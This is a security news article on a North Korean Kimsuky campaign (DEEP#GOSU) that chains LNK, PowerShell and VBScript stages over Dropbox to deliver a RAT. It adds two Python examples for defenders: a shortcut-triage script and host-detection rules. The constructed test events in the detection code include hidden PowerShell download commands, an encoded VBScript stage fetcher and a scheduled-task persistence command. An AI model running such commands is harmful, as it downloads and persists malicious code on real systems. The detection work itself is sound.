A recent attack campaign by one of North Korea's state-run hacking groups uses a new PowerShell- and VBScript-based attack chain that is initiated from inside LNK (Windows shortcut) files. Multiple attack stages are downloaded from legitimate cloud services, and the final payload is an open-source remote access trojan.
"The whole C2 communication is handled via legitimate services such as Dropbox or Google Docs, allowing the malware to blend undetected into regular network traffic," researchers from security firm Securonix said in a report. "Since these payloads were pulled from remote sources like Dropbox, it allowed the malware maintainers to dynamically update its functionalities or deploy additional modules without direct interaction with the system."
Kimsuky is an advanced persistent threat (APT) group that has been active since at least 2012. It is one of several cyberespionage and sabotage groups associated with the North Korean government and is believed to be run by the 5th Bureau (Inter-Korean Affairs) of the country's foreign intelligence agency. As a result, compared to other North Korean groups like Lazarus, APT38, and Andariel (Silent Chollima), Kimsuky primarily targets South Korean organizations and individuals.
LNK delivery mechanism
This was also the case in the new campaign analyzed by Securonix, which the company dubbed DEEP#GOSU. The attack chain started with phishing emails carrying a South Korean-themed lure and .zip attachments. The zip archives contained a file with a double extension, IMG_20240214_0001.pdf.lnk, masquerading as a PDF. The files were actually Windows link (shortcut) files containing an embedded PowerShell script that launched the multi-stage attack chain.
The LNK file is over 2MB, which is unusual for a shortcut file, because a PDF file has been appended to it. The script searches for the exact byte offset of the PDF within the shortcut, extracts it, creates a new object in memory to hold it, and then uses the PowerShell Start-Process cmdlet to open it. This displays the PDF in the computer's default PDF viewer, mimicking the behavior the user would expect from clicking a PDF.
"What makes this tactic clever is that there's technically no PDF file contained within the initial zip file sent to the victim," the researchers said. "When the user clicks the PDF lure (shortcut file) they're immediately presented with a PDF file, thus removing any concern that anything unexpected happened."
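The following Python is an added example, not Securonix's code and not the campaign's own script. It triages a shortcut the way the report describes the lure working: it checks the ShellLink header, locates an appended PDF by byte offset and carves it out, and pulls any PowerShell command line out of the shortcut's UTF-16LE body. The sample shortcut, its command line and the 256 KB size threshold are constructed for the example; the real LNK was over 2MB.

```python
"""Triage of an oversized .lnk that carries an appended PDF decoy.

Added example, not Securonix's code or the DEEP#GOSU script itself. The
sample shortcut is built inline so the file runs offline; it is a few
hundred bytes, whereas the reported lure was over 2MB."""
from __future__ import annotations

import re

# Fixed ShellLink header fields: HeaderSize 0x4C followed by the ShellLink
# CLSID {00021401-0000-0000-C000-000000000046} as stored little-endian.
LNK_MAGIC = bytes.fromhex("4C000000" "01140200" "0000" "0000" "C000000000000046")
HEADER_SIZE = 0x4C
PDF_MAGIC = b"%PDF-"
PDF_EOF = b"%%EOF"
# Benign shortcuts are a few KB; anything above this is worth a look.
SIZE_THRESHOLD = 256 * 1024  # assumption chosen for this example


def build_sample_lnk(pdf: bytes, command: str) -> bytes:
    """Construct a minimal LNK-shaped blob: header, a UTF-16LE command line in
    the body (shortcut arguments are stored as UTF-16LE), padding, then the
    PDF appended after the shortcut data. Constructed test data only."""
    header = LNK_MAGIC + b"\x00" * (HEADER_SIZE - len(LNK_MAGIC))
    body = command.encode("utf-16-le") + b"\x00" * 64
    return header + body + pdf


def is_lnk(blob: bytes) -> bool:
    return blob[: len(LNK_MAGIC)] == LNK_MAGIC


def find_appended_pdf(blob: bytes) -> tuple[int, int] | None:
    """Return (start, end) of a PDF that follows the LNK header, or None.
    Mirrors the reported technique: locate %PDF- by byte offset and stop at
    the final %%EOF (plus one trailing newline if present)."""
    start = blob.find(PDF_MAGIC, HEADER_SIZE)
    if start < 0:
        return None
    eof = blob.rfind(PDF_EOF)
    if eof < start:
        return None
    end = eof + len(PDF_EOF)
    if blob[end:end + 1] in (b"\n", b"\r"):
        end += 1
    return start, end


def extract_pdf(blob: bytes) -> bytes | None:
    span = find_appended_pdf(blob)
    return blob[span[0]:span[1]] if span else None


def embedded_powershell(blob: bytes) -> list[str]:
    """Recover UTF-16LE text after the header that looks like a PowerShell
    invocation; a match ends at the first NUL character."""
    text = blob[HEADER_SIZE:].decode("utf-16-le", errors="ignore")
    return re.findall(r"(?i)powershell[^\x00]{0,200}", text)


def triage_lnk(filename: str, blob: bytes) -> dict:
    """Score a shortcut on the four signals this lure exhibits: double
    extension, oversized file, appended PDF, PowerShell in the arguments."""
    span = find_appended_pdf(blob)
    findings = {
        "is_lnk": is_lnk(blob),
        "double_extension": bool(re.search(r"\.(pdf|docx?|xlsx?)\.lnk$", filename, re.I)),
        "oversized": len(blob) > SIZE_THRESHOLD,
        "appended_pdf_at": span[0] if span else None,
        "powershell_cmds": embedded_powershell(blob),
    }
    findings["suspicious"] = bool(
        findings["is_lnk"]
        and (findings["double_extension"] or span is not None or findings["powershell_cmds"])
    )
    return findings


if __name__ == "__main__":
    # Constructed sample: a tiny PDF and a hypothetical shortcut command line.
    sample_pdf = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"
    sample_cmd = 'powershell.exe -ep bypass -w hidden -c "Start-Process lure.pdf"'
    sample = build_sample_lnk(sample_pdf, sample_cmd)
    print(triage_lnk("IMG_20240214_0001.pdf.lnk", sample))
```

Run against a directory of quarantined attachments, any shortcut that is both oversized and carries a PDF marker after offset 0x4C is the shape described here; the carved PDF can then be opened in a sandbox without executing the shortcut.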
PowerShell payloads leading to RAT
At the same time, the PowerShell script downloads a second payload called ps.bin from a Dropbox URL, decrypts it using the AESDecrypt function, and then executes it. This is yet another PowerShell script that downloads additional payloads from Dropbox. First, it downloads and dynamically loads several .NET assemblies that give the script advanced graphical UI capabilities. Such capabilities have been used in the past by malware to take screenshots and record the victim's screen.
Another downloaded payload is a file called r_enc.bin, a variant of an open-source remote access trojan known as TruRat, TutRat, or C# R.A.T., whose agent is usually called TutClient.exe. "Currently this particular RAT software is quite old and likely to be picked up by most antivirus vendors," the researchers said. "However, given the unique method in which this binary is loaded and executed directly into memory (stage2), it's likely to skirt some detections."
More specifically, loading the malicious code directly into memory is often called "fileless" execution because the decrypted stages are never written to disk, which defeats traditional file-based antivirus scanning. The label is only partly accurate here: the zip archive and the 2MB LNK do land on disk, and the PowerShell stages remain visible to script block logging (Event ID 4104) and AMSI at execution time, so host-based detections that hook script execution rather than files are still effective.
The capabilities of this RAT include keylogging, remote desktop, spying via the microphone and camera, remote command prompt execution, process and file management, hiding message boxes, menus and desktop objects, distributed denial-of-service attacks, and stealing information stored in the built-in password managers of several browsers.
VBScript comes into play
At the same time, the stage 2 PowerShell script invokes a large Base64-encoded string that turns out to be VBScript code. This appears to be yet another payload delivery mechanism, because the VBScript also connects to Dropbox and downloads an additional payload called info_sc.txt that contains even more VBScript code.
This new script is quite complex and uses the Windows Management Instrumentation (WMI) API to perform additional actions, including gathering information about the operating system and creating scheduled tasks on the system for persistence. If the OS is older than Windows 10, the script downloads yet another payload from a Dropbox URL, but first uses Google Docs to determine the payload URL.
The VBScript code then drops a PowerShell script on the system. That script handles periodic command-and-control communication over Dropbox and loads a final script that acts as a powerful backdoor with keylogging and clipboard monitoring capabilities. "The malware payloads used in the DEEP#GOSU represent a sophisticated, multi-stage threat designed to operate stealthily on Windows systems especially from a network-monitoring standpoint," the researchers said. "It relied on both PowerShell and VBScript for its execution which interestingly enough used very minimal obfuscation. Each stage was encrypted using AES and a common password and IV which should minimize network, or flat file scanning detections."
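Because the C2 traffic hides in Dropbox and Google Docs, the practical detection surface for this chain is on the host: a script host fetching from a consumer cloud service, a script host spawned by another script host, a Base64 blob inside a PowerShell command line that decodes to VBScript, and scheduled-task creation from a script. The Python below is an added example (not from the Securonix report) that runs those four checks over constructed Sysmon-style process-creation records; the paths, the task name and the dropbox.com URLs are made up for the example and are not indicators from the campaign.

```python
"""Host-side detection of the PowerShell/VBScript chain behaviours above.

Added example, not from the Securonix report. Events are constructed
'Key=Value|Key=Value' process-creation records with invented paths and
URLs; nothing here is an indicator from the campaign."""
from __future__ import annotations

import base64
import binascii
import re

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
CLOUD_C2_HOSTS = ("dropbox.com", "dropboxusercontent.com", "docs.google.com")
VBS_MARKERS = re.compile(r'(?i)\b(CreateObject|WScript\.|GetObject\(\s*"winmgmts|Set\s+\w+\s*=)')
TASK_MARKERS = re.compile(r"(?i)(schtasks(\.exe)?\s+/create|Register-ScheduledTask|Win32_ScheduledJob|Schedule\.Service)")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")  # long runs only, to skip hashes and GUIDs


def parse_event(line: str) -> dict[str, str]:
    """Parse one constructed record into a dict; the value keeps any later '='."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_b64_blobs(cmdline: str) -> list[str]:
    """Decode long Base64 runs. -EncodedCommand payloads are UTF-16LE (every
    odd byte of ASCII text is NUL); anything else is tried as UTF-8."""
    out = []
    for blob in B64_BLOB.findall(cmdline):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        if len(raw) % 2 == 0 and not any(raw[1::2]):
            out.append(raw.decode("utf-16-le"))
        else:
            try:
                out.append(raw.decode("utf-8"))
            except UnicodeDecodeError:
                continue
    return out


def detect(events: list[str]) -> list[tuple[int, str, str]]:
    """Return (event_index, rule, detail) for every rule an event trips."""
    hits = []
    for i, line in enumerate(events):
        ev = parse_event(line)
        image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        # Rule 1: one script host launching another (VBScript dropping PowerShell).
        if image in SCRIPT_HOSTS and parent in SCRIPT_HOSTS and image != parent:
            hits.append((i, "script-host-chain", f"{parent} -> {image}"))
        if image in SCRIPT_HOSTS:
            # Rule 2: script host talking to a consumer cloud service used as C2.
            for host in CLOUD_C2_HOSTS:
                if host in cmd.lower():
                    hits.append((i, "cloud-service-fetch", host))
                    break
            # Rule 3a: persistence via scheduled-task APIs named in the command line.
            task = TASK_MARKERS.search(cmd)
            if task:
                hits.append((i, "scheduled-task-persistence", task.group(0)))
        # Rule 3b: schtasks.exe itself spawned by a script host.
        if image == "schtasks.exe" and parent in SCRIPT_HOSTS and "/create" in cmd.lower():
            hits.append((i, "scheduled-task-persistence", f"schtasks from {parent}"))
        # Rule 4: Base64 in the command line that decodes to VBScript or to a C2 URL.
        for text in decode_b64_blobs(cmd):
            if VBS_MARKERS.search(text):
                hits.append((i, "base64-embedded-vbscript", text[:40]))
            for host in CLOUD_C2_HOSTS:
                if host in text.lower():
                    hits.append((i, "cloud-service-fetch", f"{host} (inside Base64)"))
                    break
    return hits


# Constructed VBScript stage, encoded the way -EncodedCommand expects (UTF-16LE).
VBS_STAGE = (
    'Set objXML = CreateObject("MSXML2.XMLHTTP")\r\n'
    'objXML.Open "GET", "https://www.dropbox.com/s/EXAMPLE/info_sc.txt?dl=1", False\r\n'
    'objXML.Send\r\n'
    'Set objWMI = GetObject("winmgmts:\\\\.\\root\\cimv2")\r\n'
)
VBS_B64 = base64.b64encode(VBS_STAGE.encode("utf-16-le")).decode()

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
WS = "C:\\Windows\\System32\\wscript.exe"
EXPL = "C:\\Windows\\explorer.exe"
SAMPLE_EVENTS = [  # constructed; only event 0 is benign
    "Image=" + PS + "|ParentImage=" + EXPL + "|CommandLine=powershell.exe Get-Service",
    "Image=" + PS + "|ParentImage=" + EXPL + "|CommandLine=powershell.exe -ep bypass -w hidden -c "
    "\"(New-Object Net.WebClient).DownloadData('https://www.dropbox.com/s/EXAMPLE/ps.bin?dl=1')\"",
    "Image=" + PS + "|ParentImage=" + PS + "|CommandLine=powershell.exe -nop -enc " + VBS_B64,
    "Image=" + PS + "|ParentImage=" + WS + "|CommandLine=powershell.exe -nop -w hidden -File C:\\Users\\Public\\dbx.ps1",
    "Image=C:\\Windows\\System32\\schtasks.exe|ParentImage=" + WS
    + "|CommandLine=schtasks.exe /create /sc minute /mo 30 /tn Updater /tr C:\\Users\\Public\\dbx.ps1",
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Rule 4 is the one that matters most for this chain: decoding the Base64 before matching is what exposes both the VBScript and the Dropbox URL that the raw command line hides, and it costs nothing on events without a long Base64 run.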